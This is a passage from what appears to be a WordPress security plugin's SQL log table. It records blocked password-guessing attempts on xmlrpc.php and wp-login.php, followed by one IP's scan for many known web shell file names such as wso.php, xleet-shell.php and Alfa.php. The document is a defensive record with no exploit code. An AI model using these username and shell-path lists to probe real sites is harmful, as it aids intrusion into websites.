|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.73',1540107849,'dermen',0,1681906316.5557,152,'blHEV4z7Radmc63vKON1QSpr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.130.0.72',1384251464,'Admin',0,1681906316.9956,152,'mIES7en91vubRVQZiODgdL2X','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.73',1540107849,'Admin',0,1681906319.1851,152,'eSUyMhNacGVvDtuI3spPKL70','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.73',1540107849,'',0,1681906319.1897,10,'eSUyMhNacGVvDtuI3spPKL70','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('198.71.235.55',3326602039,'admin1',0,1681906320.5957,152,'KWNmup9PznkdgXva0oLFGAMI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.94.209.234',1834930666,'admin',0,1681906325.8512,152,'5F8l4Kd9iNfQEAgGe6hqzSwa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.54.124.210',3325459666,'editor',0,1681906333.5712,152,'JF0vms1zuaP59lUZIbxBgit4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.62.161',804404897,'user2',0,1681906341.4185,152,'KgkUM1yYSIsPfAtjHeCh3Zu7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'admin',0,1681906346.5762,152,'mvXPgbfaGHw5otLE0ld7DTJr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.98.5.232',3110209000,'admin',0,1681906346.7838,152,'vX6DiFEoP0OIz4cYnV8GaLNC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.26.127.250',3642392570,'test',0,1681906357.4149,152,'N8y4DhziodpvAlXZJY7ae0sG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.64.127.195',3644882883,'techspt',0,1681907506.4146,152,'FzS5nMrD48UbpiEaBVhRe10O','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'admin',0,1681909478.9905,152,'AxP1i35cKFjpf7otdeW4Na2B','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'0x1999',0,1681909482.4889,152,'OzXFxK6k5iyu0tS47ZUIh1JB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'admin',0,1681909485.6585,152,'85zb39uiFTRHCp0EoYSZmltj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('49.50.84.123',825382011,'admin',0,1681909486.8375,152,'RX3SKPZw7IsAJqMnEkc4Qv6t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.154.184.198',1738193094,'maria',0,1681909492.2332,152,'O7tbneTpRqK6WsNdUZyAv4r0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.208.164.126',3117458558,'developer',0,1681909502.7094,152,'dCByKA81fEFzouXOhtGsxQb3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.135.143.169',92770217,'test',0,1681909505.6666,152,'aYrbmJeoczK4uRfCNwFt9pnB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.169.35.181',1739137973,'marketing',0,1681909505.9296,152,'Q1FiUtsdqfNKhY5OwELTnHlp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('50.62.137.47',842959151,'Admin',0,1681910776.7069,152,'N1dR5BUmJjikl2obLXnYOPpV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'test',0,1681910777.5413,152,'ueHf42bDZW3swcqkayzUYpAJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.232.58',2717968442,'admin2',0,1681910782.5808,152,'Q6DS4jht5WsEVoyBvaCLceXM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.89.203.225',2673462241,'test',0,1681910794.9641,152,'Yhxoew0LVzPJicQp9kv5qgmn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('164.132.84.209',2760135889,'admin919',0,1681910799.2828,152,'8cDbCjBYhxaSQr6oiMHd2Kmg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'teste',0,1681910800.0984,152,'CnpWUeYcrZLfxT4BSzkh0V58','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.182.56.150',3115726998,'admin',0,1681910804.6431,152,'oRvqMPIG0BQk2Oy6HL5xpi8D','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('69.49.247.110',1160902510,'bunyawee',0,1681910804.9601,152,'aVTkCvqoEYnrxsFK036SjtHW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.26.127.250',3642392570,'Admin',0,1681910809.0942,152,'s8knZT95ofK7BctyvOpIVeW0','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'admin',0,1681910814.0225,152,'y18Vv6RN9Xq7fdenbploTPtG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'',0,1681910814.0297,10,'y18Vv6RN9Xq7fdenbploTPtG','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('92.205.2.176',1556939440,'demo',0,1681910818.4509,152,'5K2hREJbgy7Sp1HNCUBxPAtk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('149.127.214.172',2508183212,'ali',0,1681910824.5536,152,'1xuUEZnhs3QIrzBJXcRVMiNd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('161.97.187.66',2707536706,'Admin',0,1681912505.2044,152,'5xyozMl9qubN7HU8DvYdOnmf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('208.109.61.155',3496820123,'chynna',0,1681912505.8476,152,'cmk0t8SEbp9I17C4j6UZOLvg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'bob',0,1681912511.0470,152,'PkVxgK1MGWC6YrRJ2e0FmIjN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.85.102.40',3562366504,'maria',0,1681912511.6208,152,'tK0PGVduUHnlFSNbZkxpjqoc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('161.97.187.66',2707536706,'Admin',0,1681912513.0324,152,'ycwKzf6AdGQUTVkub4elagps','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('161.97.187.66',2707536706,'',0,1681912513.0375,10,'ycwKzf6AdGQUTVkub4elagps','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('5.135.143.169',92770217,'admin2022',0,1681912519.5132,152,'oKhLIsPn0CUVdr4x2J1cbWzf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'admin',0,1681912527.2352,152,'xl2HG9KwrAmYQpdTigb4Jcn1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'admin',0,1681912527.9636,152,'nUINkF5Rly6zJ9mCgHGtPXjv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'',0,1681912527.9722,10,'nUINkF5Rly6zJ9mCgHGtPXjv','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('163.172.168.158',2746001566,'user',0,1681912529.4920,152,'tDzyLXU5ZF1Jxu0kS9p7BRmH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.109.24.229',1097668837,'editor',0,1681912533.5976,152,'rFKYbXmZRkepuvQLn9o8SafA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.36.174.113',908373617,'enamad',0,1681912538.5559,152,'mGCi84u3VJRMlKzxrWTE1nOe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'thomas',0,1681912552.2754,152,'GhAqdmDMYTI3BWgCKUwz86Rc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('125.227.111.133',2112057221,'orangganteng1',0,1681915391.9766,152,'AkUwMQixGK0NatpcTs5b4yLg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'admin',0,1681915398.8509,152,'l0sVgF2um5xb6azMwtPkjUXR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.89.203.225',2673462241,'test',0,1681915409.9642,152,'PAtElcuLy82wkZbGJOhRgjm9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.26.127.250',3642392570,'admin',0,1681915412.6188,152,'KA9jBqxFJ0vNb63fIzHMd4Vc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.26.127.250',3642392570,'',0,1681915412.6222,10,'KA9jBqxFJ0vNb63fIzHMd4Vc','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('198.38.91.22',3324402454,'customer',0,1681915415.7016,152,'gRFfjnYcLt0WiOCmkuhNpDIo','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'kiki',0,1681915423.1094,152,'qmhFQ5ypMA2fnGgCLOU1ve67','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('205.185.124.254',3451485438,'melissa',0,1681916115.2103,7,'pyICMVlDvOkjbnqiU3m0JAF4','','0|0|0|0|cmdev-site1.com/wp-login.php',0,0,0),('205.185.124.254',3451485438,'techspt',0,1681916158.5030,7,'jn5eFQ8Jmfk9asxVXHpRd0GN','','0|0|0|0|cmdev-site1.com/wp-login.php',0,0,0),('205.185.124.254',3451485438,'',0,1681916158.5112,10,'jn5eFQ8Jmfk9asxVXHpRd0GN','','701|0|0|0|cmdev-site1.com/wp-login.php',0,701,0),('54.191.137.17',918522129,'',0,1681919686.0427,10,'vTAPc6xiUm9lWfwqre5VMbQS','','701|0|0|0|cmdev-site1.com/the-wild-hunt/',0,701,0),('54.191.137.17',918522129,'',0,1681919787.9617,50,'BNjR3kUyh0JxHf7EA2Dw1Wbu','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('54.191.137.17',918522129,'',0,1681919789.9474,50,'Jr4deHy1Y965MkwEuASbPBQU','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('213.152.162.74',3583550026,'techspt',0,1681919805.6116,152,'nJjKo8Tx4MZ1hfWr2AePRpLi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.195.124.72',868449352,'admin',0,1681919844.6330,152,'Uf3z1IpHGcoAmQ6EP87VulSD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('80.237.3.97',1357710177,'karen',0,1681919847.3947,152,'VGCBU83JmTznwZXjHfrg9ODW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'preview',0,1681919849.1334,152,'U42XKb60mSzQZqk1WLgoM8nu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.23.50.207',85406415,'jsjobs_employer',0,1681919860.5101,152,'OLBtqxVDzdbC9eHhEw4kP1aI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.26.127.250',3642392570,'phlox',0,1681919868.4963,152,'PJTFxets4HM67vWInf8drD03','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.141.215.15',3113080591,'admin',0,1681919869.2579,152,'ILvJzSrjDRhw1UtXnTOg9y6u','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'admin',0,1681919874.2750,152,'FoRBwYpJt2aZf7uzQcrX9GmH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.98.5.232',3110209000,'admin',0,1681919875.7318,152,'p4ZnqLwKusQ9lCghm7jbHTeR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('192.241.158.94',3237060190,'admin',0,1681919881.4252,152,'cQukdX7fAKOwSH9t13DEWYTs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('172.105.163.59',2892604219,'prueba',0,1681919889.2758,152,'ncCRgJpFrSYdXHMvL3BijQuP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.191.137.17',918522129,'',0,1681919891.7639,50,'zD3c54SpEjl2LuArXJk9wiWV','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('54.191.137.17',918522129,'',0,1681919893.4395,50,'joVGSbWiKYCUguwaQrPReAtd','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('103.241.64.155',1743863963,'',0,1681920328.5179,55,'oxa5veT1JZ9Sk6MgLBcCRtXy','','19|0|0|0|cmdev-site1.com/Makhdamx.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920329.8292,55,'gfkmjXcVEMS4Aeu1Qo83DndN','','19|0|0|0|cmdev-site1.com/database.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920329.8316,10,'gfkmjXcVEMS4Aeu1Qo83DndN','','707|0|0|0|cmdev-site1.com/database.php',0,707,0),('103.241.64.155',1743863963,'',0,1681920331.2024,55,'zHCZwr5kG34ahoRSx9uKM6OF','','19|0|0|0|cmdev-site1.com/wp-commentin.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920333.0478,100,'SNLCUlckBHf30OjoPim2a9F1','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('103.241.64.155',1743863963,'',0,1681920334.4024,55,'OFriBnmb5AZLJhPEtWkesQcg','','19|0|0|0|cmdev-site1.com/xltavrat.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920335.6595,55,'jAhGPqBO8gQ9JxiKplwYcFrH','','19|0|0|0|cmdev-site1.com/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920337.1917,55,'pRH2xyoM18VcWaNXtf3Er6Je','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoplugins/index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920338.6260,55,'wr9SCQOavk2UpzsgRf7bBM4H','','19|0|0|0|cmdev-site1.com/wso112233.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920340.1378,55,'kBPpgCNJdyvMbHDKf3cUl1GX','','19|0|0|0|cmdev-site1.com/xleet-shell.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920341.3978,55,'qcg70WSzyMtX1afCjpxukHAL','','19|0|0|0|cmdev-site1.com/xleet.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920343.1937,55,'jfQP9MTpKLsz4cA1tGYIvnCa','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoplugins/mar.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920344.4812,55,'nBPk4CwRKTgQ9JSEYmjFu8zt','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/mar.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920345.9240,50,'ivB5esVLMHk649CmFo8nt71R','','10|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,10,0),('103.241.64.155',1743863963,'',0,1681920345.9245,55,'ivB5esVLMHk649CmFo8nt71R','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920347.3094,55,'cWtvlyJXE86hF0AsUp5B9wxH','','19|0|0|0|cmdev-site1.com/0z.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920348.6007,55,'bSuLwXrxlFOVQ1Bes8ZhiUEP','','19|0|0|0|cmdev-site1.com/fw.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920349.9608,55,'wUj8bXq0ft7SZoC32diIVnFJ','','19|0|0|0|cmdev-site1.com/wp-includes/wp-class.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920351.4220,55,'bwkrCDpeE0hzSR8gyKxHmZO7','','19|0|0|0|cmdev-site1.com/radio.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920353.1170,55,'QghqnifFOSaZdXNolLI2DAxK','','19|0|0|0|cmdev-site1.com/i.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920354.4649,55,'LusXzkxiab1lQ3veEOM4Zpht','','19|0|0|0|cmdev-site1.com/o.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920355.8069,55,'t2cOCU4duNvpoBFD7fnxSAie','','19|0|0|0|cmdev-site1.com/alwso.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920357.2472,55,'4IPfvx10QEOYKGzDZdFR9asl','','19|0|0|0|cmdev-site1.com/wp-blog.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920358.5219,55,'RMqoITmwtQKbGJEZCUaz4DBP','','19|0|0|0|cmdev-site1.com/u.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920359.8582,55,'Yl2suXVEkyh8LbZUdcaGNMKx','','19|0|0|0|cmdev-site1.com/templates/beez5/index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920361.1420,55,'7fu3jtxsnKIX1cQyBgr5vPCD','','19|0|0|0|cmdev-site1.com/mini.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920363.0307,55,'0TpPiUbu3stNOMGx8jzK1fvg','','19|0|0|0|cmdev-site1.com/x.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920364.3986,55,'y6QUVRzftqYK14gChJDnSuAe','','19|0|0|0|cmdev-site1.com/404.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920365.9167,55,'qEb8T3aH2r7KZhCBn5fIFY9L','','19|0|0|0|cmdev-site1.com/13.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920367.4379,55,'Ivd1BrRViDNu4zHyFJ7ChSXm','','19|0|0|0|cmdev-site1.com/11index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920368.9165,55,'HN82DMewWqcJduivrsfC1zZA','','19|0|0|0|cmdev-site1.com/wp-uploads.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920370.2029,55,'L4SMTbYIElcOwhi8ZzPq2kfJ','','19|0|0|0|cmdev-site1.com/sh.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920371.6906,55,'SrI3jVGeJZTnxNMp71qbDRa2','','19|0|0|0|cmdev-site1.com/k.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920373.4690,55,'C37EKXmtWYZs92LcoRDjbPpe','','19|0|0|0|cmdev-site1.com/wikindex.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920374.7261,55,'VOJeY4ZKWaqlxd0S16RCgHwU','','19|0|0|0|cmdev-site1.com/y.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920376.0670,55,'0mGdWuN5p3FZkJyUwhtsjgT8','','19|0|0|0|cmdev-site1.com/alf.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920377.4781,55,'4v20KrJThdm6OxEVP3aYC9Bj','','19|0|0|0|cmdev-site1.com/WSO.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920378.7307,55,'ub1YClHazVB8o5IxJg2LKiPO','','19|0|0|0|cmdev-site1.com/10.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920380.0779,55,'9f2J0znhu1Uxr46dWjokE8wC','','19|0|0|0|cmdev-site1.com/2index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920381.5575,55,'gwC2szOQeALKq01d3r6ENfBh','','19|0|0|0|cmdev-site1.com/mari.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920383.3326,55,'jdrbvHCA758hY0QSK6Xeyzgm','','19|0|0|0|cmdev-site1.com/1.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920384.6157,55,'7ziamg9BQuDKfdw0LxVeqTR8','','19|0|0|0|cmdev-site1.com/100.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920386.1763,55,'dsjSzgxJbF3IiMtnky0YCwO7','','19|0|0|0|cmdev-site1.com/wp-admin.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920387.4093,55,'0GF1z5NeRXIpctKCg6dnY43i','','19|0|0|0|cmdev-site1.com/shx.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920389.1170,55,'ZgUoPyI5nSHli4Ff7WhCVG8J','','19|0|0|0|cmdev-site1.com/xx.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920390.3955,55,'3NJQg8aT1ImuzUi6DpHtPFkc','','19|0|0|0|cmdev-site1.com/shell.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920391.8161,55,'ZOiU7vDAPaIxc4zqXu6dY1ke','','19|0|0|0|cmdev-site1.com/wso1.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920393.2018,55,'ZlRduAe4UcyBmih3nz5N18Cv','','19|0|0|0|cmdev-site1.com/doc.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920394.5371,55,'3mAEROU8QNixjrdSKeTGy1fs','','19|0|0|0|cmdev-site1.com/wso2.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920396.1089,55,'k9bxCGp2OqQ81ogMf6VwAHYy','','19|0|0|0|cmdev-site1.com/wp-content/wp.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920397.4994,55,'kbB2mnAzDjG5fQXNwLPUFrEq','','19|0|0|0|cmdev-site1.com/uploads/up.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920398.8168,55,'sDNwk2yq6Qtx4peHhP3Xo8mG','','19|0|0|0|cmdev-site1.com/old-index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920400.3588,55,'d75vWtzfjigD23uE1ZeqYOkr','','19|0|0|0|cmdev-site1.com/9.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920401.7014,55,'2dlHjsv0pVErfTLMUAGFcqKD','','19|0|0|0|cmdev-site1.com/date.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920403.4905,55,'cpuWJfZiCPTw4kSnU9omFby7','','19|0|0|0|cmdev-site1.com/n.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920404.8068,55,'lt2pLFUonQ8D376Nx0qSsHkC','','19|0|0|0|cmdev-site1.com/p.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920406.2066,55,'H4SIpX9bVzxjn3ydKQNthkBv','','19|0|0|0|cmdev-site1.com/mar.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920407.9627,55,'We9ypUCAxXq4EVPlmoush5L8','','19|0|0|0|cmdev-site1.com/01.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920409.8703,55,'9F36fNlkGHZvrbKa4cuLdOI2','','19|0|0|0|cmdev-site1.com/0.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920411.2745,55,'tlFYsW43oRgHNKrP1VBykEmC','','19|0|0|0|cmdev-site1.com/wp-admin/fw.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920413.2454,55,'EUNmr36PGv4hsMYVF5W8liwt','','19|0|0|0|cmdev-site1.com/about.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920414.3661,71,'zS53d9kLQJt8iFPToGZW4X6p','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('103.241.64.155',1743863963,'',0,1681920416.4570,55,'7JgnMis48TpqNOXCIyjdfH5l','','19|0|0|0|cmdev-site1.com/ups.php',0,19,0),('213.152.161.5',3583549701,'techspt',0,1681920416.8314,152,'zMqiG1NyRfYpSXnbCKH2UwP9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.241.64.155',1743863963,'',0,1681920417.7810,55,'ZLjGK3bcXsCkxNoVMPAuWhlF','','19|0|0|0|cmdev-site1.com/wp-content/x.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920419.1217,55,'QfUeOxFqCwnR01AbW8sNGz5D','','19|0|0|0|cmdev-site1.com/root.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920420.5800,55,'NZJu7X3IkWTS1DBRP8MshpEK','','19|0|0|0|cmdev-site1.com/wp-content/fw.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920422.4197,55,'5b2mVKfPL1cQkTOEBJdyizpx','','19|0|0|0|cmdev-site1.com/wp-includes/about.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920424.7706,55,'d2kQiwL5DIeG1PqCYNx0Va6l','','19|0|0|0|cmdev-site1.com/q.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920426.4878,55,'u862cG9YX5Arl0JwOvezNUbk','','19|0|0|0|cmdev-site1.com/xxx.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920427.9025,55,'pubRYflKwAsh4zVoCL6k8v7q','','19|0|0|0|cmdev-site1.com/h.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920429.3866,55,'MdcZBSADuqsUN8Cg9oVlpYXf','','19|0|0|0|cmdev-site1.com/a.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920430.9318,55,'qhjbulGKfQUgZaAX7O5kJrdR','','19|0|0|0|cmdev-site1.com/fox.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920432.3099,55,'dF1PmHWoYkstARfI5zCi2q8J','','19|0|0|0|cmdev-site1.com/wp-includes/991176.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920434.2557,55,'C1kfDAHyncFWBwQ8epqbuvzX','','19|0|0|0|cmdev-site1.com/wp-admin/radio.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920435.7263,55,'nUhm3b1eSC8aqO4PxTWZQiRA','','19|0|0|0|cmdev-site1.com/wp.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920437.2274,55,'azU7fvJSYObkT49VGj2Xuins','','19|0|0|0|cmdev-site1.com/wp-file.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920438.5796,55,'St8k2yrJ9amBQYF71LXNTsvo','','19|0|0|0|cmdev-site1.com/jindex.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920439.9574,55,'Huji3VR2NnKBChI9y1vUoEAP','','19|0|0|0|cmdev-site1.com/Alfa.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920441.3564,55,'YxNIy6mq8TeBWfDEgK2HpvsM','','19|0|0|0|cmdev-site1.com/403.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920442.9159,55,'OEgpYhwA6GqZQSF1jfsHkNxU','','19|0|0|0|cmdev-site1.com/0byte.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920444.1943,55,'L9tJrsZYqS30hj1MzEvpUcIQ','','19|0|0|0|cmdev-site1.com/s.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920445.8806,55,'BGzmEJZ9re5C0HoqnNkhO26w','','19|0|0|0|cmdev-site1.com/haxor.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920447.5371,55,'179BvmiNsV3lQhA8MGIOPgat','','19|0|0|0|cmdev-site1.com/xl.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920448.9085,55,'jeFL6xmODv8a7rlQ9uNzT24R','','19|0|0|0|cmdev-site1.com/r.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920450.3340,55,'rnBizGU8qWXZawgdhFe4A6lP','','19|0|0|0|cmdev-site1.com/hello.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920451.9321,55,'PHo3QgLvGiKUpJd9AOV2E7sk','','19|0|0|0|cmdev-site1.com/4.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920453.2235,55,'FUM3hfuRkzXQsnLe6PqNAKZx','','19|0|0|0|cmdev-site1.com/g.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920454.6593,55,'C2OAv5UyJ7grDQ1wnNdbluP4','','19|0|0|0|cmdev-site1.com/priv8.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920456.0999,55,'fUYKm6pvkIlVMBG20LwErXZW','','19|0|0|0|cmdev-site1.com/wp-class.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920457.5786,55,'YcesrwmNzkp9y1gZB3jOTQx4','','19|0|0|0|cmdev-site1.com/wp-admin/css/fw.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920459.0845,55,'dcpNJPOVv5RGobW9jAB0U63F','','19|0|0|0|cmdev-site1.com/uploader.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920460.3532,55,'MwbgGTSOdiVWqNhB7c12Xnl8','','19|0|0|0|cmdev-site1.com/e.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920461.7390,55,'8f4Vj2ryl1NbpCsZeg95cQv7','','19|0|0|0|cmdev-site1.com/2.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920463.3007,55,'ZhUqQ2RclPYkL4TOxXEBb5NA','','19|0|0|0|cmdev-site1.com/wp_wrong_datlib.php',0,19,0),('103.241.64.155',1